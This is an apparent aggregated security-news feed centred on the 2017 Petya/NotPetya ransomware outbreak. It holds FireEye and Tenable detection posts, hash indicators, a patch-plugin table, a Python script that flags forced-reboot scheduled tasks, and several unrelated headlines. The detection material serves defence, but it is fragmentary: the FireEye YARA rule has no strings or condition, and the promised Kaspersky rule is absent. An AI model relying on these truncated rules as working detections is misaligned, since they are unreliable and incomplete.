- 71b6a493388e7d0b40c83ce903bc6b04
- e285b6ce047015943e685e6638bd837e
FireEye has mobilized a Community Protection Event and is continuing to investigate these reports and the threat activity involved in these disruptive incidents. FireEye as a Service (FaaS) is actively engaged in monitoring customer environments.
While FireEye detection leverages behavioral analysis of malicious techniques, our team has created a YARA rule to assist organizations in retroactively searching their environments for this malware, as well as detecting future activity. Our team has focused on the malicious attacker techniques that are core to the operation of the malware: SMB drive usage, ransom demand language, the underlying functions and APIs, and the system utilities used for lateral movement. The thresholds can be modified in the condition section that follows.
rule FE_CPE_MS17_010_RANSOMWARE {
    // RANSOMNOTE
    // FUNCTIONALITY, APIS
    // COMMANDS
    condition:
FireEye has read reports that the malware is spread by an email lure containing a malicious Office document attachment or links to infected documents exploiting CVE-2017-0199. We are confident that this document is unrelated to the current outbreak of activity, and we have seen no other indicators that CVE-2017-0199 is related. While FireEye detects these campaigns, we have not observed any correlation with known victims of the Petya attacks.
Implications
This activity highlights the importance of organizations securing their systems against the EternalBlue exploit and ransomware infections. Microsoft has provided a guide for securing Windows systems against the EternalBlue exploit in the context of the WannaCry ransomware. A robust back-up strategy, network segmentation and air gapping where appropriate, and other defenses against ransomware can help organizations defend against ransomware distribution operations and quickly remediate infections.
from Petya Ransomware Spreading Via EternalBlue Exploit
The Amazon Echo (Horror) Show
from The Amazon Echo (Horror) Show
Petya-esque ransomware is spreading across the world
Ringing in with echoes of WannaCry, Petya (or Petrwrap, NotPetya), is a new ransomware strain outbreak affecting many users around the world.
The post Petya-esque ransomware is spreading across the world appeared first on Malwarebytes Labs.
from Petya-esque ransomware is spreading across the world
Six quick facts to know about today’s global ransomware attack
from Six quick facts to know about today’s global ransomware attack
Petya/NotPetya Ransomware Detection for the Modern Enterprise
A new version of the Petya malware is spreading through the European Union, primarily in Ukraine and Russia. It has already impacted many organizations, both large and small, and has compromised systems at Ukraine’s central bank, its state telecommunications company, municipal metro, and Kiev’s Boryspil International Airport.
Background
Petya is powered by Shadow Brokers exploits, which were leaked earlier this year, and appears to be a straightforward ransomware program. Once it has infected a computer, the virus encrypts each computer to a private key, rendering it unusable until the system is decrypted. The ransomware leverages a couple of vulnerabilities to quickly spread across the organization. It first leverages CVE-2017-0199, a vulnerability in Microsoft Office documents, which enables the execution of a malicious HTA file. The malware then infects systems that are vulnerable to MS17-010 and spreads laterally across the infrastructure.
Note: The Petya malware creates a scheduled task which reboots up to one hour after infection. If the task is removed before execution, it does not reschedule, buying you some time.
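As an added example, not Tenable's own code, here is a small Python check for the reboot task the note describes: it parses the verbose CSV output of `schtasks /query /fo CSV /v` (a constructed sample with a subset of its columns is embedded) and flags tasks whose action runs shutdown.exe with a reboot switch. That the task reboots through shutdown.exe is an assumption of this example, not a statement from the post.

```python
"""Find scheduled tasks whose action is a forced reboot.

Added example (not Tenable's code). It reads the CSV produced by
`schtasks /query /fo CSV /v`, whose columns include "TaskName",
"Next Run Time" and "Task To Run". SAMPLE_CSV is constructed and keeps
only the columns the parser uses. The assumption that the reboot is
performed via shutdown.exe is this example's, not the post's.
"""
import csv
import io
import re
import subprocess
import sys

# shutdown or shutdown.exe (any path) followed by a reboot switch (/r or -r).
REBOOT_CMD = re.compile(r'(?:^|[\\/\s"])shutdown(?:\.exe)?"?\s+.*?[/-]r\b',
                        re.IGNORECASE)

# Constructed sample in schtasks /fo CSV /v layout (column subset).
SAMPLE_CSV = '''"TaskName","Next Run Time","Status","Task To Run"
"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","7/4/2017 1:00:00 AM","Ready","%windir%\\system32\\defrag.exe -c -h -o -$"
"\\Tmp\\Reboot","6/27/2017 2:15:00 PM","Ready","C:\\Windows\\system32\\shutdown.exe /r /f"
"\\Backup\\Nightly","6/28/2017 2:00:00 AM","Ready","C:\\Tools\\backup.cmd /full"
"\\Maintenance\\Restart","6/30/2017 3:00:00 AM","Ready","shutdown -r -t 60"
'''


def find_reboot_tasks(csv_text):
    """Return [(task_name, next_run, command)] for tasks that force a reboot."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row.get("Task To Run", "")
        if REBOOT_CMD.search(cmd):
            hits.append((row["TaskName"], row["Next Run Time"], cmd))
    return hits


def query_live():
    """Run schtasks on this host (Windows only) and return its CSV text."""
    if not sys.platform.startswith("win"):
        raise RuntimeError("schtasks is only available on Windows")
    return subprocess.run(["schtasks", "/query", "/fo", "CSV", "/v"],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    live = len(sys.argv) > 1 and sys.argv[1] == "--live"
    for name, when, cmd in find_reboot_tasks(query_live() if live else SAMPLE_CSV):
        # Review each hit before removing it with: schtasks /delete /tn "<name>" /f
        print("reboot task %r scheduled for %s: %s" % (name, when, cmd))
```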
Similar to the WannaCry ransomware that infected systems globally earlier this year, Petya takes advantage of known vulnerabilities that already have patches. In a world where malware threats arise every day, chasing daily threats is not advised. Organizations everywhere and of every size need a more strategic approach to proactively manage security threats (and protect themselves and their customers) by implementing good cyber hygiene practices, including regular patching, updates, backups, and continuous monitoring.
How Tenable can help
Patch vulnerabilities
Tenable customers should immediately patch systems vulnerable to CVE-2017-0199 and MS17-010 if you haven’t already done so. Tenable.io™ Vulnerability Management has the following four plugins, released earlier this year, to detect vulnerable systems:
Plugin ID | Plugin Title/Comments | Exploits
99285 | KB4015551: Windows Server 2012 Standard April 2017 Cumulative Update | CVE-2017-0199
99304 | KB4015549: Windows 7 and Windows 2008 R2 April 2017 Cumulative Update | CVE-2017-0199
97737 | MS17-010: Security Update for Microsoft Windows SMB Server (4013389) | ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, ETERNALSYNERGY, WannaCry, EternalRocks
97833 | MS17-010: Security Update for Microsoft Windows SMB Server (4013389) uncredentialed check | ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, ETERNALSYNERGY, WannaCry, EternalRocks
Malware scan
Tenable customers can use the Malware Scan Policy in Tenable.io™ or SecurityCenter™ to detect machines infected with Petya, and the results will be reported under plugin 59275.
YARA detection
Tenable customers can also use YARA rules to identify infected systems through the Malicious File Detection Using YARA Nessus plugin.
Here’s a sample rule from Kaspersky which can be used with Nessus to detect the Petya malware:
Dashboards
The Petya dashboard uses all the available methods mentioned above to consolidate the data for easy understanding of the systems most likely affected or at risk from the malware. The components bring in netstats from Nessus and the Nessus Network Monitor, and also display the content related to missing patches associated with SMB vulnerabilities.
Wrap-up
Most ransomware exploits well-known vulnerabilities that already have patches available. Implementing a proactive security program that includes regular patching and system updating is one of the best strategies you can use to prevent malware from infecting your systems. Make it a regular habit to patch and protect.
For more information
- Learn more about Tenable.io, the first vulnerability management platform for all modern assets
- Get a free 60-day trial of Tenable.io
Many thanks to the Tenable research team for their contributions to this blog.
from Petya/NotPetya Ransomware Detection for the Modern Enterprise
USS Fitzgerald (DDG 62)
from USS Fitzgerald (DDG 62)
Fighting Leakers at Apple
Apple is fighting its own battle against leakers, using people and tactics from the NSA.
According to the hour-long presentation, Apple's Global Security team employs an undisclosed number of investigators around the world to prevent information from reaching competitors, counterfeiters, and the press, as well as hunt down the source when leaks do occur. Some of these investigators have previously worked at U.S. intelligence agencies like the National Security Agency (NSA), law enforcement agencies like the FBI and the U.S. Secret Service, and in the U.S. military.
The information is from an internal briefing, which was leaked.
from Fighting Leakers at Apple
Global ransomware outbreak happening right now
from Global ransomware outbreak happening right now
South Korean banks told to pay $315,000 or suffer DDoS wrath
from South Korean banks told to pay $315,000 or suffer DDoS wrath
GDPR and HITECH: Can the past predict the future?
In February of 2017, Memorial Healthcare System settled their HIPAA violation fines for $5.5 Million USD. During an investigation, it was discovered that over 100,000 patient records had been impermissibly accessed. Allegedly, an ex-employee retained access to personal identifying information and sold data records to people who filed fraudulent tax returns using the data. Federal […]
The post GDPR and HITECH: Can the past predict the future? appeared first on Radware Blog.
from GDPR and HITECH: Can the past predict the future?
YIN AND YANG: TWO VIEWS ON IAM – Global Risk Standards or States & Nations Policies
By Steve Mowll and Chris Williams. POINT: Chris Williams – Advisory Architect, RSA Identity. In our last blog, I stated the following about why we most commonly engage in security practices. And these two items were represented: We embrace identity projects because we need to satisfy compulsory mandates. We need to provide competitive protective services…
The post YIN AND YANG: TWO VIEWS ON IAM – Global Risk Standards or States & Nations Policies appeared first on Speaking of Security - The RSA Blog.
from YIN AND YANG: TWO VIEWS ON IAM – Global Risk Standards or States & Nations Policies
Watch out: don’t lose your passwords when you sign up online
from Watch out: don’t lose your passwords when you sign up online
Akamai Launches New Solution to Help Enterprise Security Teams Address the Impact of Malware, Ransomware, and DNS-based Data Exfiltration
from Akamai Launches New Solution to Help Enterprise Security Teams Address the Impact of Malware, Ransomware, and DNS-based Data Exfiltration
From the first ATM to contactless cashpoints: the evolution of digital payments
from From the first ATM to contactless cashpoints: the evolution of digital payments
Windows XP Spotted Running Aboard Royal Navy Aircraft Carrier
A new aircraft carrier built for the Royal Navy appears to be running the outdated 2001 Windows XP operating system on at least some of its machines. During a tour of the £3.5 billion HMS Queen Elizabeth, someone reportedly spotted a screen inside the aircraft carrier’s control room running Windows XP. Microsoft hasn’t supported this […]
The post Windows XP Spotted Running Aboard Royal Navy Aircraft Carrier appeared first on The State of Security.
from Windows XP Spotted Running Aboard Royal Navy Aircraft Carrier